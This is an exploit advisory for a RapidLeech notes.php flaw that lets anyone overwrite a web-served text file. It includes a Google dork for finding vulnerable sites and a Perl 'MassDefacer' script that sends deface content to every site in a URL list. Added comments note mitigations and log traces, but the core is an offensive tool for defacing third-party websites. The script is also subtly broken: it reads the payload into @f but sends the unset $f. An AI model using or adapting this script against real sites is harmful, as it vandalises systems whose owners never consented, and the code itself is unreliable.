[+] Author: Iranian_Dark_Coders_Team
[+] Home: WwW.IDC-TeaM.NeT
[+] Exploit Title: RapidLeech Local File Edit Vulnerability
[+] Date: 04-02-2013
[+] Category: WebApp
[+] Google Dork: intitle:"Rapidleech v2 rev. 42" - inurl:"index.php?debug=1"
[+] Tested on: Ubuntu 12.10
[+] Discovered By : M.R.S.CO
##################################
source of bug : var/www/notes.php
// Excerpt quoted from notes.php: any non-empty POSTed 'notes' value is written
// verbatim to files/<lang(327)>.txt, replacing whatever that file held before.
// The target path is built from a constant prefix and lang(327); nothing from the
// request influences the file name, only the file content.
// NOTE(review): lang(327) is presumably the localized word for "notes" (the steps
// below reference files/notes.txt and files/Notes.txt) - confirm against the language files.
// NOTE(review): no session/login check, CSRF token or content validation is visible
// in this excerpt; verify whether the rest of notes.php or the site configuration
// enforces authentication before this branch is reached.
// Mitigation: require an authenticated session before accepting the write, and keep
// the notes file outside the web-served directory (or deny direct requests to it).
if (isset($_POST['notes']) && $_POST['notes']) {
file_put_contents("files/".lang(327).".txt",$_POST['notes']);
}
##################################
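Vulnerability concept:
file_put_contents() + $_POST['notes'] = Local File Edit
(the POSTed text is written verbatim to the fixed file files/<lang(327)>.txt; the request controls that one file's content, not its path)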
##################################
1 . start
2 . go to http://site.com/notes.php
3 . Write Your text in TextArea
4 . now you can view your text in this path
http://site.com/files/notes.txt or http://site.com/files/Notes.txt
5 . end
or you can help from this exploit for mass deface rapidleech websites
##################################
##start perl code
#RapidLeech MassDefacer
#Coded By M.R.S.CO
#We Are M.R.S.CO,N3O,UB313
#Friends : G3n3Rall,BlacK.King,Nafsh,b3hz4d,Black.Hack3r
# Flat script: reads two files named on the command line and sends one HTTP POST
# to <base>/notes.php for every line of the first file.
# Traits visible to a defender in web/proxy logs:
#   - the request is a form POST (HTTP::Request::Common encodes an array-ref body as
#     application/x-www-form-urlencoded) carrying the fields 'notes' and 'submit';
#   - no agent string is set below, so requests carry LWP's default
#     "libwww-perl/<version>" User-Agent;
#   - each target receives a single POST with no preceding GET of the notes page.
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
$ua = LWP::UserAgent ->new;
# Per-request timeout of 15 seconds.
$ua->timeout(15);
# Clears the operator's terminal ('cls' on Windows, 'clear' elsewhere).
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
# Banner and usage text, printed unconditionally.
print q (
------------------------------
| Iranian Dark Coders Team |
------------------------------
| WwW.IDC-TeaM.NeT |
------------------------------
| Coded BY M.R.S.CO |
------------------------------
Usage :
perl idc.pl urls_file Deface_file
Example :
perl idc.pl urls.txt def.txt
);
# Everything below runs only when a second command-line argument is present.
if($ARGV[1])
{
# Second argument: file whose lines are read into @f. A failed open only prints a
# message; execution continues.
open(file1, $ARGV[1]) || print "Couldn't open ".$ARGV[1]."\n";
my @f =<file1>;
# First argument: file whose lines are read into @tt, one base URL per line.
open(file, $ARGV[0]) || print "Couldn't open ".$ARGV[0]."\n";
my @tt =<file>;
foreach $url(@tt){
chomp($url);
# Target endpoint is always the base URL with "/notes.php" appended.
$url1=$url."/notes.php";
# Form body with the two fields the notes.php handler expects.
my $req = POST $url1, [
'notes'=> $f,
'submit'=> "Save+Notes"
];
# The full response is stored but never inspected afterwards.
$content = $ua->request($req)->as_string;
# Printed for every URL regardless of the response, so this output is not
# evidence that a given site was actually modified.
print $url."/files/Notes.txt\n";
}}
##end perl code
##################################